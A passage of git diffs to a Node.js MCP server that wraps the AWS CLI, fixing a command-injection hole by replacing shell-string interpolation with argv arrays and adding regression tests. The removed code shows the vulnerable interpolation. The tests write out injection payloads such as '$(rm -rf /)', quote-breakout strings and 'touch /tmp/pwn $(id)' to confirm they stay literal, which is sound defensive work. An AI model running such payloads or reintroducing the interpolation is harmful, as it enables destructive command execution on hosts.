+        JSON.stringify(filters),
+        "--query",
+        "Reservations[].Instances[].{InstanceId:InstanceId,State:State.Name,Name:Tags[?Key==`Name`].Value|[0],RangeId:Tags[?Key==`shifter:range_id`].Value|[0]}",
+      ]);
 
       const runningEc2s = ec2Result.filter(
         (i) => i.State === "running" && i.RangeId
@@ -1317,10 +1440,12 @@ server.tool(
       // 3. Execute: terminate EC2s and update DB
       const terminated = [];
       for (const orphan of orphans) {
-        const termResult = aws(
-          profile,
-          `ec2 terminate-instances --instance-ids "${orphan.ec2_id}"`
-        );
+        const termResult = aws(profile, [
+          "ec2",
+          "terminate-instances",
+          "--instance-ids",
+          orphan.ec2_id,
+        ]);
         const state =
           termResult.TerminatingInstances?.[0]?.CurrentState?.Name;
         terminated.push({ ec2_id: orphan.ec2_id, state });
@@ -2163,7 +2288,7 @@ server.tool(
   async ({ env, name_filter }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(profile, "s3api list-buckets");
+      const result = aws(profile, ["s3api", "list-buckets"]);
       let buckets = (result.Buckets || []).map((b) => ({
         name: b.Name,
         created: b.CreationDate,
@@ -2198,8 +2323,15 @@ server.tool(
   async ({ env, bucket, prefix, max_keys }) => {
     try {
       const profile = getProfile(env);
-      let args = `s3api list-objects-v2 --bucket "${bucket}" --max-items ${max_keys}`;
-      if (prefix) args += ` --prefix "${prefix}"`;
+      const args = [
+        "s3api",
+        "list-objects-v2",
+        "--bucket",
+        bucket,
+        "--max-items",
+        String(max_keys),
+      ];
+      if (prefix) args.push("--prefix", prefix);
       const result = aws(profile, args);
       const objects = (result.Contents || []).map((o) => ({
         key: o.Key,
@@ -2226,10 +2358,14 @@ server.tool(
     try {
       const profile = getProfile(env);
       // Check size first
-      const head = aws(
-        profile,
-        `s3api head-object --bucket "${bucket}" --key "${key}"`,
-      );
+      const head = aws(profile, [
+        "s3api",
+        "head-object",
+        "--bucket",
+        bucket,
+        "--key",
+        key,
+      ]);
       const size = head.ContentLength;
       const contentType = head.ContentType || "";
 
@@ -2264,10 +2400,12 @@ server.tool(
         );
       }
 
-      const content = awsText(
-        profile,
-        `s3 cp "s3://${bucket}/${key}" -`,
-      );
+      const content = awsText(profile, [
+        "s3",
+        "cp",
+        `s3://${bucket}/${key}`,
+        "-",
+      ]);
       return ok(content);
     } catch (e) {
       return err(e);
@@ -2310,7 +2448,12 @@ server.tool(
       if (!b || !k) {
         return err(new Error("Could not determine state bucket/key. Provide bucket and key explicitly."));
       }
-      const content = awsText(profile, `s3 cp "s3://${b}/${k}" -`);
+      const content = awsText(profile, [
+        "s3",
+        "cp",
+        `s3://${b}/${k}`,
+        "-",
+      ]);
       const state = JSON.parse(content);
       const resources = (state.resources || []).map((r) => ({
         module: r.module || "(root)",
@@ -2362,10 +2505,18 @@ server.tool(
       const start =
         start_date ||
         new Date(Date.now() - 30 * 86400000).toISOString().slice(0, 10);
-      const result = aws(
-        profile,
-        `ce get-cost-and-usage --time-period Start=${start},End=${end} --granularity MONTHLY --metrics BlendedCost --group-by Type=DIMENSION,Key=SERVICE`,
-      );
+      const result = aws(profile, [
+        "ce",
+        "get-cost-and-usage",
+        "--time-period",
+        `Start=${start},End=${end}`,
+        "--granularity",
+        "MONTHLY",
+        "--metrics",
+        "BlendedCost",
+        "--group-by",
+        "Type=DIMENSION,Key=SERVICE",
+      ]);
       const periods = result.ResultsByTime || [];
       let total = 0;
       const services = {};
@@ -2413,10 +2564,16 @@ server.tool(
       const start = new Date(Date.now() - days * 86400000)
         .toISOString()
         .slice(0, 10);
-      const result = aws(
-        profile,
-        `ce get-cost-and-usage --time-period Start=${start},End=${end} --granularity DAILY --metrics BlendedCost`,
-      );
+      const result = aws(profile, [
+        "ce",
+        "get-cost-and-usage",
+        "--time-period",
+        `Start=${start},End=${end}`,
+        "--granularity",
+        "DAILY",
+        "--metrics",
+        "BlendedCost",
+      ]);
       const dataPoints = (result.ResultsByTime || []).map((p) => {
         const amount = Number.parseFloat(p.Total.BlendedCost.Amount);
         return {
@@ -2469,14 +2626,17 @@ server.tool(
       // Auto-detect portal instance if not provided
       let targetId = instance_id;
       if (!targetId) {
-        const instances = aws(
-          profile,
-          `ec2 describe-instances --filters "Name=tag:Name,Values=*portal*" "Name=instance-state-name,Values=running" --query "Reservations[0].Instances[0].InstanceId" --output text`,
-        );
-        targetId = typeof instances === "string" ? instances : awsText(
-          profile,
-          `ec2 describe-instances --filters "Name=tag:Name,Values=*portal*" "Name=instance-state-name,Values=running" --query "Reservations[0].Instances[0].InstanceId"`,
-        );
+        targetId = awsText(profile, [
+          "ec2",
+          "describe-instances",
+          "--filters",
+          "Name=tag:Name,Values=*portal*",
+          "Name=instance-state-name,Values=running",
+          "--query",
+          "Reservations[0].Instances[0].InstanceId",
+          "--output",
+          "text",
+        ]);
         if (!targetId || targetId === "None") {
           return err(new Error(`No running portal instance found in ${env}`));
         }
@@ -2484,10 +2644,16 @@ server.tool(
 
       const dockerCmd = `docker exec portal python manage.py ${command}`;
       const params = JSON.stringify({ commands: [dockerCmd] });
-      const result = aws(
-        profile,
-        `ssm send-command --instance-ids "${targetId}" --document-name AWS-RunShellScript --parameters '${params}'`,
-      );
+      const result = aws(profile, [
+        "ssm",
+        "send-command",
+        "--instance-ids",
+        targetId,
+        "--document-name",
+        "AWS-RunShellScript",
+        "--parameters",
+        params,
+      ]);
       const cmdId = result.Command.CommandId;
       return ok(
         `Command sent: manage.py ${command}\nInstance: ${targetId}\nCommand ID: ${cmdId}\nUse ssm_get_command_output to check results.`,

--- a/mcp/ops/index.js
+++ b/mcp/ops/index.js
@@ -23,6 +23,9 @@ import {
   awsJson,
   awsText as awsTextLib,
   buildAwsArgv,
+  buildFilterLogEventsArgs,
+  buildSsmSendCommandArgs,
+  buildRunManageArgs,
 } from "./lib.js";
 
 // Spawn a long-running aws-cli process (e.g. an SSM port-forward that
@@ -444,16 +447,14 @@ server.tool(
     try {
       const profile = getProfile(env);
       const logGroup = resolveLogGroup(component, env);
-      const result = aws(profile, [
-        "logs",
-        "filter-log-events",
-        "--log-group-name",
-        logGroup,
-        "--filter-pattern",
-        filter_pattern,
-        "--limit",
-        String(limit),
-      ]);
+      const result = aws(
+        profile,
+        buildFilterLogEventsArgs({
+          logGroup,
+          filterPattern: filter_pattern,
+          limit,
+        })
+      );
       const lines = result.events.map(
         (e) =>
           `[${new Date(e.timestamp).toISOString()}] [${e.logStreamName}] ${e.message}`
@@ -839,17 +840,14 @@ server.tool(
       const profile = getProfile(env);
       const platform = getInstancePlatform(profile, instance_id);
       const docName = getSsmDocument(platform);
-      const params = JSON.stringify({ commands: [command] });
-      const result = aws(profile, [
-        "ssm",
-        "send-command",
-        "--instance-ids",
-        instance_id,
-        "--document-name",
-        docName,
-        "--parameters",
-        params,
-      ]);
+      const result = aws(
+        profile,
+        buildSsmSendCommandArgs({
+          instanceId: instance_id,
+          docName,
+          commands: [command],
+        })
+      );
       const cmdId = result.Command.CommandId;
       return ok(
         `Command sent (${docName}). ID: ${cmdId}\nUse ssm_get_command_output to check results.`
@@ -2664,18 +2662,10 @@ server.tool(
         }
       }
 
-      const dockerCmd = `docker exec portal python manage.py ${command}`;
-      const params = JSON.stringify({ commands: [dockerCmd] });
-      const result = aws(profile, [
-        "ssm",
-        "send-command",
-        "--instance-ids",
-        targetId,
-        "--document-name",
-        "AWS-RunShellScript",
-        "--parameters",
-        params,
-      ]);
+      const result = aws(
+        profile,
+        buildRunManageArgs({ targetId, command })
+      );
       const cmdId = result.Command.CommandId;
       return ok(
         `Command sent: manage.py ${command}\nInstance: ${targetId}\nCommand ID: ${cmdId}\nUse ssm_get_command_output to check results.`,

--- a/mcp/ops/index.js
+++ b/mcp/ops/index.js
@@ -22,7 +22,17 @@ import {
   validateManageCommand,
   awsJson,
   awsText as awsTextLib,
+  buildAwsArgv,
 } from "./lib.js";
+
+// Spawn a long-running aws-cli process (e.g. an SSM port-forward that
+// must stay open). Uses the same argv-array discipline as the
+// shared aws()/awsText() helpers so tunnel call sites cannot
+// accidentally re-introduce shell-string interpolation.
+function spawnAws(profile, args, options = {}) {
+  const argv = buildAwsArgv(args, profile, REGION);
+  return spawn("aws", argv, options);
+}
 
 const { Pool } = pg;
 
@@ -53,6 +63,10 @@ function awsText(profile, args) {
 }
 
 function getInstancePlatform(profile, instanceId) {
+  // `--output text` so the scalar query result is returned as the raw
+  // string (`Linux/UNIX`, `Windows`) rather than JSON-quoted
+  // (`"Linux/UNIX"`). Without this getSsmDocument() never matches
+  // "windows" because the value starts with a `"` instead of `w`.
   return awsText(profile, [
     "ec2",
     "describe-instances",
@@ -60,6 +74,8 @@ function getInstancePlatform(profile, instanceId) {
     instanceId,
     "--query",
     "Reservations[0].Instances[0].PlatformDetails",
+    "--output",
+    "text",
   ]);
 }
 
@@ -182,8 +198,8 @@ async function ensureTunnel(env) {
     throw new Error(`Could not find RDS endpoint for ${env}`);
   }
 
-  const proc = spawn(
-    "aws",
+  const proc = spawnAws(
+    profile,
     [
       "ssm",
       "start-session",
@@ -197,10 +213,6 @@ async function ensureTunnel(env) {
         portNumber: ["5432"],
         localPortNumber: [String(port)],
       }),
-      "--region",
-      REGION,
-      "--profile",
-      profile,
     ],
     { stdio: ["ignore", "pipe", "pipe"] }
   );
@@ -915,14 +927,24 @@ server.tool(
         return err(new Error(`Could not find running ${env} portal EC2 instance`));
       }
 
-      const tunnelProc = spawn("aws", [
-        "ssm", "start-session",
-        "--target", instanceId,
-        "--document-name", "AWS-StartPortForwardingSessionToRemoteHost",
-        "--parameters", JSON.stringify({ host: ["localhost"], portNumber: ["8000"], localPortNumber: [local_port.toString()] }),
-        "--profile", profile,
-        "--region", REGION,
-      ], { stdio: ["ignore", "pipe", "pipe"] });
+      const tunnelProc = spawnAws(
+        profile,
+        [
+          "ssm",
+          "start-session",
+          "--target",
+          instanceId,
+          "--document-name",
+          "AWS-StartPortForwardingSessionToRemoteHost",
+          "--parameters",
+          JSON.stringify({
+            host: ["localhost"],
+            portNumber: ["8000"],
+            localPortNumber: [local_port.toString()],
+          }),
+        ],
+        { stdio: ["ignore", "pipe", "pipe"] }
+      );
 
       await new Promise((resolve, reject) => {
         const timeout = setTimeout(() => {

--- a/mcp/ops/lib.js
+++ b/mcp/ops/lib.js
@@ -301,6 +301,71 @@ export function awsText(profile, args, options = {}) {
   return awsExec(profile, args, options).trim();
 }
 
+// --- Per-tool argv builders for the named-vulnerable paths in #763 ---
+//
+// These exist as pure functions so tests can assert that
+// user-controlled values land as literal argv elements without ever
+// spawning aws. The handlers in index.js call these and pass the
+// result straight to aws()/awsText(). Adding a new
+// metacharacter-containing payload to a regression test means
+// extending the per-tool test cases in lib.test.js, not editing
+// index.js.
+
+/**
+ * CloudWatch `logs filter-log-events` argv. The user-supplied
+ * `filterPattern` becomes a single argv element; no JSON.stringify
+ * wrapping is needed because there is no shell to interpret it.
+ */
+export function buildFilterLogEventsArgs({ logGroup, filterPattern, limit }) {
+  return [
+    "logs",
+    "filter-log-events",
+    "--log-group-name",
+    logGroup,
+    "--filter-pattern",
+    filterPattern,
+    "--limit",
+    String(limit),
+  ];
+}
+
+/**
+ * SSM `send-command` argv. The `commands` payload is JSON.stringify'd
+ * into a single `--parameters` argv element. The aws CLI parses that
+ * JSON itself; the local shell never sees it.
+ */
+export function buildSsmSendCommandArgs({ instanceId, docName, commands }) {
+  const params = JSON.stringify({ commands });
+  return [
+    "ssm",
+    "send-command",
+    "--instance-ids",
+    instanceId,
+    "--document-name",
+    docName,
+    "--parameters",
+    params,
+  ];
+}
+
+/**
+ * SSM `send-command` argv for the Django manage.py wrapper. The user's
+ * `command` is concatenated into the docker-exec invocation that runs
+ * inside the remote shell on the EC2 host. That remote shell IS
+ * intentional (the tool's contract is to forward a command for remote
+ * execution); the security boundary protected here is the LOCAL host
+ * shell, which never sees the payload because the wrapped string
+ * lands inside the JSON parameters argv element.
+ */
+export function buildRunManageArgs({ targetId, command }) {
+  const dockerCmd = `docker exec portal python manage.py ${command}`;
+  return buildSsmSendCommandArgs({
+    instanceId: targetId,
+    docName: "AWS-RunShellScript",
+    commands: [dockerCmd],
+  });
+}
+
 // --- Shared ---
 
 export function getProfile(profiles, env) {

--- a/mcp/ops/lib.js
+++ b/mcp/ops/lib.js
@@ -1,5 +1,7 @@
 // Shared constants and helpers for the shifter-ops MCP server.
 
+import { spawnSync } from "node:child_process";
+
 export const REGION = "us-east-2";
 
 // --- AWS ---
@@ -204,6 +206,97 @@ export function validateManageCommand(command) {
     );
   }
   return parts;
+}
+
+// --- AWS CLI execution ---
+//
+// All aws-cli invocations run through these helpers. Callers MUST pass
+// args as an argv array, not a shell string — buildAwsArgv enforces it
+// via TypeError. The argv is handed to spawnSync, so values containing
+// `$()`, backticks, quotes, etc. are forwarded literally to the aws
+// binary instead of being interpreted by the local host shell. Shell
+// escaping is not a remediation strategy for this component; see
+// mcp/ops/SECURITY.md.
+
+/**
+ * Build the argv array passed to spawnSync("aws", ...).
+ * Preserves caller args byte-for-byte and appends profile, region, and
+ * any extra flags last so the helper's flags override anything the
+ * caller supplied (matches the prior shell-string ordering).
+ */
+export function buildAwsArgv(args, profile, region, extraFlags = []) {
+  if (!Array.isArray(args)) {
+    throw new TypeError(
+      "AWS CLI args must be an argv array, not a shell string. " +
+        "Passing a shell string would re-introduce the command-injection " +
+        "path that issue #763 closed."
+    );
+  }
+  return [
+    ...args,
+    "--profile",
+    profile,
+    "--region",
+    region,
+    ...extraFlags,
+  ];
+}
+
+function defaultRunner(cmd, argv, options) {
+  return spawnSync(cmd, argv, options);
+}
+
+/**
+ * Run `aws` with an argv array. Returns stdout. Throws on non-zero exit
+ * with the trimmed stderr (or a generic message). The runner is
+ * injectable so tests can capture the argv without spawning a real
+ * process.
+ */
+export function awsExec(profile, args, options = {}) {
+  const {
+    extraFlags = [],
+    region = REGION,
+    runner = defaultRunner,
+    timeoutMs = 60000,
+  } = options;
+  const argv = buildAwsArgv(args, profile, region, extraFlags);
+  const result = runner("aws", argv, {
+    encoding: "utf-8",
+    timeout: timeoutMs,
+  });
+  if (result.error) {
+    throw result.error;
+  }
+  if (result.status !== 0) {
+    const stderr = (result.stderr || "").trim();
+    throw new Error(
+      stderr || `aws exited with status ${result.status}`
+    );
+  }
+  return result.stdout;
+}
+
+/**
+ * Run `aws` with `--output json` appended and parse the result.
+ * Append after the caller's flags so it overrides any user-supplied
+ * `--output` (matches the prior shell-string behavior of `aws()`).
+ */
+export function awsJson(profile, args, options = {}) {
+  const extraFlags = [
+    "--output",
+    "json",
+    ...(options.extraFlags || []),
+  ];
+  const stdout = awsExec(profile, args, { ...options, extraFlags });
+  return JSON.parse(stdout);
+}
+
+/**
+ * Run `aws` and return trimmed stdout. Does NOT append `--output text`;
+ * callers that need text output must include it in their args.
+ */
+export function awsText(profile, args, options = {}) {
+  return awsExec(profile, args, options).trim();
 }
 
 // --- Shared ---

--- a/mcp/ops/lib.js
+++ b/mcp/ops/lib.js
@@ -278,14 +278,16 @@ export function awsExec(profile, args, options = {}) {
 
 /**
  * Run `aws` with `--output json` appended and parse the result.
- * Append after the caller's flags so it overrides any user-supplied
- * `--output` (matches the prior shell-string behavior of `aws()`).
+ * `--output json` is the LAST flag in the final argv so it always
+ * overrides any `--output` flag the caller supplied via either `args`
+ * or `options.extraFlags` (matches the prior shell-string behavior of
+ * `aws()`, where `--output json` was tacked on at the end).
  */
 export function awsJson(profile, args, options = {}) {
   const extraFlags = [
+    ...(options.extraFlags || []),
     "--output",
     "json",
-    ...(options.extraFlags || []),
   ];
   const stdout = awsExec(profile, args, { ...options, extraFlags });
   return JSON.parse(stdout);

--- a/mcp/ops/lib.test.js
+++ b/mcp/ops/lib.test.js
@@ -25,6 +25,9 @@ import {
   awsExec,
   awsJson,
   awsText,
+  buildFilterLogEventsArgs,
+  buildSsmSendCommandArgs,
+  buildRunManageArgs,
 } from "./lib.js";
 
 // ---------------------------------------------------------------------------
@@ -744,6 +747,163 @@ describe("awsJson", () => {
     const { argv } = runner.calls[0];
     const last = argv.lastIndexOf("--output");
     assert.equal(argv[last + 1], "json");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Per-tool argv builders for the named-vulnerable paths in #763.
+//
+// These tests are the per-tool counterpart to spawn-roundtrip.test.js
+// and the buildAwsArgv tests above. Together they prove that:
+//   1. The argv builder for each named-vulnerable tool drops a
+//      metacharacter-laden user payload into a single argv element
+//      (these tests).
+//   2. spawnSync forwards every argv element literally
+//      (spawn-roundtrip.test.js).
+//   3. The shared awsExec wrapper does not modify caller args
+//      (buildAwsArgv / awsExec tests above).
+// Chained, the three guarantees mean a `$()`/backtick/quote payload
+// reaching `filter_log_events`, `ssm_send_command`, or
+// `run_manage_command` cannot be evaluated by the local host shell.
+// ---------------------------------------------------------------------------
+
+describe("buildFilterLogEventsArgs", () => {
+  it("drops the filter pattern into a single argv element", () => {
+    const argv = buildFilterLogEventsArgs({
+      logGroup: "/portal/dev",
+      filterPattern: "error",
+      limit: 50,
+    });
+    assert.deepEqual(argv, [
+      "logs",
+      "filter-log-events",
+      "--log-group-name",
+      "/portal/dev",
+      "--filter-pattern",
+      "error",
+      "--limit",
+      "50",
+    ]);
+  });
+
+  it("preserves $() in the filter pattern as a literal argv element", () => {
+    const argv = buildFilterLogEventsArgs({
+      logGroup: "/portal/dev",
+      filterPattern: "$(rm -rf /)",
+      limit: 1,
+    });
+    assert.equal(argv.indexOf("--filter-pattern") + 1, argv.indexOf("$(rm -rf /)"));
+    assert.equal(argv[5], "$(rm -rf /)");
+  });
+
+  it("preserves backticks, quotes, semicolons, ampersands, pipes, and newlines literally", () => {
+    const payload = "`id`\";'|&;\nrm -rf /";
+    const argv = buildFilterLogEventsArgs({
+      logGroup: "/portal/dev",
+      filterPattern: payload,
+      limit: 1,
+    });
+    assert.equal(argv[5], payload);
+  });
+
+  it("stringifies a numeric limit so the argv element is always a string", () => {
+    const argv = buildFilterLogEventsArgs({
+      logGroup: "/g",
+      filterPattern: "x",
+      limit: 200,
+    });
+    assert.equal(argv[7], "200");
+    assert.equal(typeof argv[7], "string");
+  });
+});
+
+describe("buildSsmSendCommandArgs", () => {
+  it("wraps commands in a JSON.stringified --parameters argv element", () => {
+    const argv = buildSsmSendCommandArgs({
+      instanceId: "i-0123456789abcdef0",
+      docName: "AWS-RunShellScript",
+      commands: ["uptime"],
+    });
+    assert.deepEqual(argv, [
+      "ssm",
+      "send-command",
+      "--instance-ids",
+      "i-0123456789abcdef0",
+      "--document-name",
+      "AWS-RunShellScript",
+      "--parameters",
+      JSON.stringify({ commands: ["uptime"] }),
+    ]);
+  });
+
+  it("keeps shell metacharacters inside the commands JSON literal (single argv element)", () => {
+    const cmd = "echo $(whoami) && touch /tmp/pwn";
+    const argv = buildSsmSendCommandArgs({
+      instanceId: "i-aaaa",
+      docName: "AWS-RunShellScript",
+      commands: [cmd],
+    });
+    const parametersIdx = argv.indexOf("--parameters");
+    assert.equal(typeof argv[parametersIdx + 1], "string");
+    assert.equal(argv.length, parametersIdx + 2);
+    const parsed = JSON.parse(argv[parametersIdx + 1]);
+    assert.deepEqual(parsed, { commands: [cmd] });
+  });
+
+  it("survives a single-quote breakout payload as one argv element", () => {
+    const cmd = "'; rm -rf /; echo '";
+    const argv = buildSsmSendCommandArgs({
+      instanceId: "i-aaaa",
+      docName: "AWS-RunShellScript",
+      commands: [cmd],
+    });
+    const parameters = argv[argv.indexOf("--parameters") + 1];
+    assert.deepEqual(JSON.parse(parameters), { commands: [cmd] });
+  });
+
+  it("encodes embedded newlines into the JSON parameters argv element", () => {
+    const cmd = "line one\nline two\n; rm -rf /";
+    const argv = buildSsmSendCommandArgs({
+      instanceId: "i-aaaa",
+      docName: "AWS-RunShellScript",
+      commands: [cmd],
+    });
+    const parameters = argv[argv.indexOf("--parameters") + 1];
+    assert.deepEqual(JSON.parse(parameters), { commands: [cmd] });
+  });
+});
+
+describe("buildRunManageArgs", () => {
+  it("wraps the management command in docker-exec inside the SSM JSON parameters", () => {
+    const argv = buildRunManageArgs({
+      targetId: "i-deadbeef",
+      command: "showmigrations",
+    });
+    assert.equal(argv[0], "ssm");
+    assert.equal(argv[1], "send-command");
+    assert.equal(argv[5], "AWS-RunShellScript");
+    const parameters = argv[argv.indexOf("--parameters") + 1];
+    const parsed = JSON.parse(parameters);
+    assert.deepEqual(parsed, {
+      commands: ["docker exec portal python manage.py showmigrations"],
+    });
+  });
+
+  it("preserves user metacharacters inside the docker-exec command (single argv element)", () => {
+    const argv = buildRunManageArgs({
+      targetId: "i-deadbeef",
+      command: "check; touch /tmp/pwn $(id)",
+    });
+    const parameters = argv[argv.indexOf("--parameters") + 1];
+    const parsed = JSON.parse(parameters);
+    assert.deepEqual(parsed, {
+      commands: [
+        "docker exec portal python manage.py check; touch /tmp/pwn $(id)",
+      ],
+    });
+    // The whole JSON payload is still one argv element — never split
+    // by spaces, never re-evaluated by the local shell.
+    assert.equal(typeof argv[argv.indexOf("--parameters") + 1], "string");
   });
 });
 

--- a/mcp/ops/lib.test.js
+++ b/mcp/ops/lib.test.js
@@ -590,19 +590,27 @@ describe("buildAwsArgv", () => {
   });
 });
 
-describe("awsExec", () => {
-  function fakeRunner({ status = 0, stdout = "", stderr = "", error = null } = {}) {
-    const calls = [];
-    const fn = (cmd, argv, options) => {
-      calls.push({ cmd, argv, options });
-      return { status, stdout, stderr, error };
-    };
-    fn.calls = calls;
-    return fn;
-  }
+// Module-scoped helper: builds a runner that records every call and
+// returns a canned result, so tests can assert on the argv without
+// spawning a real `aws` process.
+function makeRecordingRunner({
+  status = 0,
+  stdout = "",
+  stderr = "",
+  error = null,
+} = {}) {
+  const calls = [];
+  const fn = (cmd, argv, options) => {
+    calls.push({ cmd, argv, options });
+    return { status, stdout, stderr, error };
+  };
+  fn.calls = calls;
+  return fn;
+}
 
+describe("awsExec", () => {
   it("invokes the runner with cmd='aws' and the built argv", () => {
-    const runner = fakeRunner({ stdout: "ok\n" });
+    const runner = makeRecordingRunner({ stdout: "ok\n" });
     awsExec("p", ["s3", "ls"], { runner });
     assert.equal(runner.calls.length, 1);
     assert.equal(runner.calls[0].cmd, "aws");
@@ -617,7 +625,7 @@ describe("awsExec", () => {
   });
 
   it("forwards extraFlags and region overrides through buildAwsArgv ordering", () => {
-    const runner = fakeRunner({ stdout: "x" });
+    const runner = makeRecordingRunner({ stdout: "x" });
     awsExec("p", ["logs"], {
       runner,
       region: "eu-west-1",
@@ -635,18 +643,18 @@ describe("awsExec", () => {
   });
 
   it("returns stdout untrimmed", () => {
-    const runner = fakeRunner({ stdout: "  hello\n" });
+    const runner = makeRecordingRunner({ stdout: "  hello\n" });
     assert.equal(awsExec("p", ["s3", "ls"], { runner }), "  hello\n");
   });
 
   it("rethrows runner.error", () => {
     const boom = new Error("boom");
-    const runner = fakeRunner({ error: boom });
+    const runner = makeRecordingRunner({ error: boom });
     assert.throws(() => awsExec("p", ["s3", "ls"], { runner }), /boom/);
   });
 
   it("throws with trimmed stderr on non-zero status", () => {
-    const runner = fakeRunner({
+    const runner = makeRecordingRunner({
       status: 1,
       stderr: "  AccessDenied: bad creds\n",
     });
@@ -657,7 +665,7 @@ describe("awsExec", () => {
   });
 
   it("falls back to a generic message when stderr is empty and status is non-zero", () => {
-    const runner = fakeRunner({ status: 2 });
+    const runner = makeRecordingRunner({ status: 2 });
     assert.throws(
       () => awsExec("p", ["s3", "ls"], { runner }),
       /aws exited with status 2/
@@ -665,13 +673,13 @@ describe("awsExec", () => {
   });
 
   it("propagates timeout option to the runner", () => {
-    const runner = fakeRunner({ stdout: "x" });
+    const runner = makeRecordingRunner({ stdout: "x" });
     awsExec("p", ["s3", "ls"], { runner, timeoutMs: 500 });
     assert.equal(runner.calls[0].options.timeout, 500);
   });
 
   it("requires args to be an array (rejects shell strings)", () => {
-    const runner = fakeRunner({ stdout: "x" });
+    const runner = makeRecordingRunner({ stdout: "x" });
     assert.throws(
       () => awsExec("p", "s3 ls", { runner }),
       (e) => e instanceof TypeError
@@ -681,18 +689,11 @@ describe("awsExec", () => {
 });
 
 describe("awsJson", () => {
-  function fakeRunner(stdout) {
-    return (cmd, argv) => {
-      fakeRunner.lastArgv = argv;
-      return { status: 0, stdout, stderr: "", error: null };
-    };
-  }
-
   it("appends --output json after caller args and parses stdout", () => {
-    const runner = fakeRunner('{"a":1}');
+    const runner = makeRecordingRunner({ stdout: '{"a":1}' });
     const out = awsJson("p", ["ec2", "describe-instances"], { runner });
     assert.deepEqual(out, { a: 1 });
-    assert.deepEqual(fakeRunner.lastArgv, [
+    assert.deepEqual(runner.calls[0].argv, [
       "ec2",
       "describe-instances",
       "--profile",
@@ -705,22 +706,22 @@ describe("awsJson", () => {
   });
 
   it("places --output json AFTER caller-supplied --output flags so it wins", () => {
-    const runner = fakeRunner('{"a":1}');
+    const runner = makeRecordingRunner({ stdout: '{"a":1}' });
     awsJson("p", ["ec2", "describe-instances", "--output", "text"], {
       runner,
     });
-    const argv = fakeRunner.lastArgv;
+    const { argv } = runner.calls[0];
     const last = argv.lastIndexOf("--output");
     assert.equal(argv[last + 1], "json");
   });
 
   it("forwards user-supplied extraFlags before the json output flags", () => {
-    const runner = fakeRunner('[]');
+    const runner = makeRecordingRunner({ stdout: "[]" });
     awsJson("p", ["s3api", "list-buckets"], {
       runner,
       extraFlags: ["--max-items", "10"],
     });
-    assert.deepEqual(fakeRunner.lastArgv, [
+    assert.deepEqual(runner.calls[0].argv, [
       "s3api",
       "list-buckets",
       "--profile",

--- a/mcp/ops/lib.test.js
+++ b/mcp/ops/lib.test.js
@@ -21,6 +21,10 @@ import {
   MAX_S3_READ_SIZE,
   isBinaryContentType,
   validateManageCommand,
+  buildAwsArgv,
+  awsExec,
+  awsJson,
+  awsText,
 } from "./lib.js";
 
 // ---------------------------------------------------------------------------
@@ -466,6 +470,290 @@ describe("validateManageCommand", () => {
   it("rejects unknown commands", () => {
     assert.throws(() => validateManageCommand("custom_thing"), /Unknown/);
     assert.throws(() => validateManageCommand("makemigrations"), /Unknown/);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// AWS CLI argv-builder and execution helpers (issue #763)
+// ---------------------------------------------------------------------------
+
+describe("buildAwsArgv", () => {
+  it("appends --profile, --region, and extra flags after caller args", () => {
+    const argv = buildAwsArgv(
+      ["logs", "describe-log-streams", "--log-group-name", "/portal/dev"],
+      "dev-profile",
+      "us-east-2",
+      ["--output", "json"]
+    );
+    assert.deepEqual(argv, [
+      "logs",
+      "describe-log-streams",
+      "--log-group-name",
+      "/portal/dev",
+      "--profile",
+      "dev-profile",
+      "--region",
+      "us-east-2",
+      "--output",
+      "json",
+    ]);
+  });
+
+  it("works with no extra flags", () => {
+    const argv = buildAwsArgv(
+      ["s3", "ls"],
+      "p",
+      "us-east-2"
+    );
+    assert.deepEqual(argv, [
+      "s3",
+      "ls",
+      "--profile",
+      "p",
+      "--region",
+      "us-east-2",
+    ]);
+  });
+
+  it("rejects shell-string args with TypeError", () => {
+    assert.throws(
+      () => buildAwsArgv("logs describe-log-streams", "p", "r"),
+      (e) =>
+        e instanceof TypeError &&
+        /argv array/.test(e.message) &&
+        /#763/.test(e.message)
+    );
+  });
+
+  it("rejects null args with TypeError", () => {
+    assert.throws(
+      () => buildAwsArgv(null, "p", "r"),
+      (e) => e instanceof TypeError
+    );
+  });
+
+  it("rejects undefined args with TypeError", () => {
+    assert.throws(
+      () => buildAwsArgv(undefined, "p", "r"),
+      (e) => e instanceof TypeError
+    );
+  });
+
+  it("preserves $() command-substitution payloads literally", () => {
+    const argv = buildAwsArgv(
+      ["logs", "filter-log-events", "--filter-pattern", "$(rm -rf /)"],
+      "p",
+      "r"
+    );
+    assert.equal(argv[3], "$(rm -rf /)");
+  });
+
+  it("preserves backtick payloads literally", () => {
+    const argv = buildAwsArgv(
+      ["logs", "filter-log-events", "--filter-pattern", "`id`"],
+      "p",
+      "r"
+    );
+    assert.equal(argv[3], "`id`");
+  });
+
+  it("preserves single quotes literally", () => {
+    const argv = buildAwsArgv(
+      ["ssm", "send-command", "--parameters", "'; touch /tmp/pwn; echo '"],
+      "p",
+      "r"
+    );
+    assert.equal(argv[3], "'; touch /tmp/pwn; echo '");
+  });
+
+  it("preserves double quotes, semicolons, ampersands, pipes, newlines literally", () => {
+    const payload = `";|&\n$(whoami)`;
+    const argv = buildAwsArgv(
+      ["logs", "filter-log-events", "--filter-pattern", payload],
+      "p",
+      "r"
+    );
+    assert.equal(argv[3], payload);
+  });
+
+  it("preserves the SSM --parameters JSON shape with embedded shell metacharacters", () => {
+    const params = JSON.stringify({
+      commands: [`echo $(rm -rf /)`],
+    });
+    const argv = buildAwsArgv(
+      ["ssm", "send-command", "--instance-ids", "i-0123456789abcdef0", "--parameters", params],
+      "p",
+      "r"
+    );
+    assert.equal(argv[5], params);
+    assert.ok(argv[5].includes("$(rm -rf /)"));
+  });
+});
+
+describe("awsExec", () => {
+  function fakeRunner({ status = 0, stdout = "", stderr = "", error = null } = {}) {
+    const calls = [];
+    const fn = (cmd, argv, options) => {
+      calls.push({ cmd, argv, options });
+      return { status, stdout, stderr, error };
+    };
+    fn.calls = calls;
+    return fn;
+  }
+
+  it("invokes the runner with cmd='aws' and the built argv", () => {
+    const runner = fakeRunner({ stdout: "ok\n" });
+    awsExec("p", ["s3", "ls"], { runner });
+    assert.equal(runner.calls.length, 1);
+    assert.equal(runner.calls[0].cmd, "aws");
+    assert.deepEqual(runner.calls[0].argv, [
+      "s3",
+      "ls",
+      "--profile",
+      "p",
+      "--region",
+      REGION,
+    ]);
+  });
+
+  it("forwards extraFlags and region overrides through buildAwsArgv ordering", () => {
+    const runner = fakeRunner({ stdout: "x" });
